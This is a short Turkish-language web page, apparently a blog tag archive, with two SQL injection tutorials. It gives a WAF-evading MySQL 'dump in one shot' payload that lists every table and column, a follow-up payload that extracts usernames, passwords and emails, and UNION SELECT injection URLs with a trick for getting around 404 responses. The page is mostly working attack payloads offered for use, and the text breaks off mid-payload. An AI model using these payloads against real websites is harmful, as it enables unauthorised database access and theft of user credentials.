İçeriğe geç

Etiket: sql injection kolon yansımıyor

Mysql Sql İnjection DİOS BY ZEN WAF BYPASS

TABLO ADI VE KOLON ADI BİLGİLERİNİ ÇIKARIR Kod: (SeLecT(@x)FrOm(SeLecT(@x:=0x00),(SeLecT(@x)FrOm(/*!50000iNfoRMaTioN_ScHeMa.coLumNs*/)wHeRe(TaBLe_ScHeMa!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=/*!50000CoNcaT*/(@x,0x3c62723e,TaBLe_NaMe,0x203a3a20,CoLumN_NaMe))))x) KOLONDAKİ BİLGİLERİ ÇEKMEK Kod: (SeLecT(@x)FrOm(SeLecT(@x:=0x00),(SeLecT(@x)FrOm(kolon ismi)wHeRe(0x00)in(@x:=/*!50000CoNcaT*/(@x,0x3c62723e,kulladi,0x203a3a20,kullsif,0x203a3a20,email))))x)

Mysql Sql İnjection 404 error (kolon yansımıyorsa)

Kolon numaralarını yansıtma sırasında 404 sayfasına atıyor yada 404 error hatası veriyorsa sayfa 4 den sonra hata veriyor demekki 4 üzerinden gideceğiz Kod: xxxx.php?id=35+/*!50000union*/+/*!50000select*/+1,2,3,4 yaptınız ve kolon numarasını yansıtmak için Kod: xxxx.php?id=-35+/*!50000union*/+/*!50000select*/+1,2,3,4 komutunu uyguladınız fakat 404 error hatası aldınız. Bunu bypass etmek için Kod: xxxx.php?id=35′ aNd 7154691=7154691 aNd ‘6199’=’6199 -‘+/*!50000union*/+/*!50000select*/+1111+,2222,3333,4444–…